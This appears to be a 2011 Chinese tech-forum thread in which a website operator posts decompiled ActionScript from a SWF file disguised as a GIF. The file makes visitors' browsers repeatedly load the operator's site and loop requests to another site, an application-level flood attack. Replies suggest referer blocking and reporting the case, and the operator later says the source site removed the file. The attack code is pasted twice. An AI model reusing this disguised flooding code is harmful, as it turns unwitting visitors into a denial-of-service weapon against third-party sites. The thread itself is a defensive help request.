这是一个创建于 5391 天前的主题,其中的信息可能已经有所发展或是发生改变。
此人在某个流量比较高的网站挂了一个GIF图。
打开后是红叉。
我下载到本地。 发现是用SWF伪装成的GIF
反编译后代码如下
loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
loadMovieNum ("http://www.xxx.com/home.php", 1115192);
loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
loadMovieNum ("http://www.xxx.com/group.php", 1115194);
loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
loadMovieNum ("http://home.xxx.com/index.php", 1115198);
if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
i = 1;
while (i <= 1000000000000 , i++) {
getURL ("http://www.taobao.com");
}
} else {
play();
}
xxx.com 是我们的网站。。
只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。
各位有办法么
打开后是红叉。
我下载到本地。 发现是用SWF伪装成的GIF
反编译后代码如下
loadMovieNum ("http://bbs.xxx.com/space.php?uid=680064", 1115191);
loadMovieNum ("http://www.xxx.com/home.php", 1115192);
loadMovieNum ("http://home.xxx.com/space.php?uid=2185", 1115193);
loadMovieNum ("http://www.xxx.com/group.php", 1115194);
loadMovieNum ("http://bbs.xxx.com/archiver/index.php?tid-658710.html", 1115195);
loadMovieNum ("http://bbs.xxx.com/task.php?action=apply&id=20", 1115196);
loadMovieNum ("http://mp3.xxx.com/hot.php", 1115197);
loadMovieNum ("http://home.xxx.com/index.php", 1115198);
if (_root._url.indexOf("img.xxxxxxxx.com") == -1) {
i = 1;
while (i <= 1000000000000 , i++) {
getURL ("http://www.taobao.com");
}
} else {
play();
}
xxx.com 是我们的网站。。
只要访客访问到他网站上的这个GIF图。就会不停的读取我们网站的数据。导致各频道频繁卡死。
各位有办法么
19 条回复 1970-01-01 08:00:00 +08:00
 | 1 shellex 2011-01-08 21:55:56 +08:00 从flash过来的请求,Referer是多少?还有SourceIP也可以看到 |
 | 2 rety2008 OP IP比较多。。 2分钟内就已经屏蔽了大概16000多IP了。 基本都是QQ空间过来的。 |
 | 3 iugo 2011-01-08 22:05:56 +08:00 呵呵,有点意思。不知道你阻止来自该网站的页面请求可以不。 |
 | 4 predator 2011-01-08 22:19:42 +08:00 via iPod 从log入手先把可疑的referer封了。 |
 | 5 simpx 2011-01-08 22:19:55 +08:00 把referer是那个比较高的网站的流量都禁止了。不知道这样可以么?刚搜到http://www.cnblogs.com/rialover/archive/2010/10/29/1864313.html 这篇文章测试了一下通过swf访问get访问url,在有些浏览器中是可以获得正常referer的。 |
| 6 OP 目前解决办法是开启硬件防火墙。 但是开启防火墙后 QQ空间用户只要用了他网站上的这个FLASH做装饰的。 就被当成攻击IP被屏蔽了 现在已经屏蔽了几万个了。 也就是很多QQ空间用户访问不了我们网站了 |
 | 7 Kymair 2011-01-08 22:35:51 +08:00 可以报案么? |
| 8 rety2008 OP 看来只能报案了。 |
| 9 shellex 2011-01-08 23:19:46 +08:00 呵呵...app level的ddos,霸道无比。话说,既然是“用了他网站上的这个FLASH做装饰”,那直接溯源到“他网站”就好了。 |
 | 10 9hills 2011-01-08 23:54:04 +08:00 这个很厉害 |
 | 11 GordianZ 2011-01-09 00:03:48 +08:00 就是cc攻击。要防的话就如#4 #5所说,ban referer可以从一定程度上解决,而且不会出现硬防IP导致QQ空间用户不能访问的结果。 |
| 12 rety2008 OP 谢谢各位。事情已经得以解决。 找到源头后。联系了该网站的管理员。 经确认,是网站内部技术人员所为。 已经撤掉这段代码。 |
| 13 rety2008 OP 现在有一个比较郁闷的事情。。 就是他这个文件已经被很多用户的浏览器缓存。 虽然服务器上已经去掉这个文件。 但攻击依然有一小部分存在。 多数为用户缓存。 对方也在想办法, 如何设置才能把这些用户的缓存快速清理掉呢 |
 | 15 napoleonu 2011-01-09 15:17:41 +08:00 做doodle的人想秒掉哪个网站岂不是真的叫秒掉,我曾经幻想Google用此方法秒God Fucked Wall |
 | 17 xman 2011-01-09 18:18:53 +08:00 这是全部代码吗? |
 | 19 silver0511 2011-01-19 16:48:00 +08:00 0 0 |
Select Language